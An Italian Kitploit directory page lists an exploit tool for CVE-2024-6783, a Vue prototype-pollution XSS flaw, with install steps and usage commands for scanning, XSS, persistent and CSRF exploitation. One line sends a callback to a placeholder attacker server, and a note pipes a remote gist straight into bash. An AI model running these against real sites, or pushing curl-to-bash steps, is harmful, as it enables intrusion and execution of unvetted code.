Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
Strumenti/GitHubGitHub/horkimhab/cve-2024-6783
Analisi delle VulnerabilitàCTFApprendimento e FormazioneRisorse CuratePercorsi e CorsiLab e Pratica
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

Vedi Repository
25 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2024-6783 - Vue CVE

È stata scoperta una vulnerabilità in Vue che consente a un attaccante di eseguire XSS tramite prototype pollution. L'attaccante potrebbe modificare la catena dei prototipi di alcune proprietà come Object.prototype.staticClass o Object.prototype.staticStyle per eseguire codice JavaScript arbitrario.

Donazioni

Supporta la manutenzione di questo progetto con PayPal o scansionando il codice QR qui sotto.

paypal

QR code for donation

⚡ Utilizzo Semplice

Usa questo progetto solo in ambienti sicuri e autorizzati come:

  • Macchine virtuali locali
  • Container Docker
  • Configurazioni di laboratorio isolate
  • Ambienti di penetration testing autorizzati

Configurazione di esempio:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# Il progetto usa Python come segue

# Crea un ambiente virtuale
python -m venv venv

# Attiva l'ambiente virtuale

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Installa le dipendenze
pip install -r requirements.txt

Esempio di utilizzo:

root@kitploit:~
# solo scansione
python cve-2024-6783.py -u https://example.com -v

# Scansione e sfruttamento XSS
python cve-2024-6783.py -u https://example.com -e xss

# Sfruttamento XSS con Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# Server Callback Automatico
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# Sfruttamento CSRF
python cve-2024-6783.py -u https://example.com -e csrf

# Scansione completa e sfruttamento con output verboso
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

Nota:

  • Se cloni un altro progetto devi eseguire curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y per eliminare la directory .git annidata
  • es: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crediti o Riferimenti

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 Repository Educativo di Ricerca sulla Sicurezza

Un repository per apprendere, testare e ricercare concetti di cybersicurezza in ambienti controllati.


⚠️ Disclaimer di Sicurezza e Legale

Scopo

Questo repository è destinato esclusivamente a ricerca educativa e di sicurezza autorizzata.

È progettato per aiutare gli utenti a conoscere:

  • Vulnerabilità di sicurezza
  • Concetti di sandbox e isolamento
  • Pratiche di codifica sicura e difensive

Solo Uso Autorizzato

Usa questo repository solo in ambienti in cui hai il permesso, come:

  • Laboratori personali o macchine virtuali
  • Ambienti Docker o isolati
  • Penetration testing autorizzato
  • Formazione sulla cybersicurezza o ricerca accademica

L'uso non autorizzato o illegale è severamente proibito.


Nessuna Responsabilità

L'autore e i collaboratori non sono responsabili per danni, usi impropri, problemi legali o perdite causati da questo progetto.

Utilizzando questo repository accetti che:

  • Sei responsabile delle tue azioni
  • Lo utilizzerai in modo legale ed etico
  • Il progetto è fornito senza garanzia

Uso Etico

Questo progetto è pensato per:

  • Ricerca di sicurezza difensiva
  • Educazione alla cybersicurezza
  • Consapevolezza delle vulnerabilità
  • Ricerca su sistemi e software sicuri

Si prega di seguire le pratiche di divulgazione responsabile e di rispettare tutte le leggi applicabili.


Contatti

Per divulgazione responsabile o collaborazione, contatta il manutentore del repository tramite GitHub.

Scarica lo strumento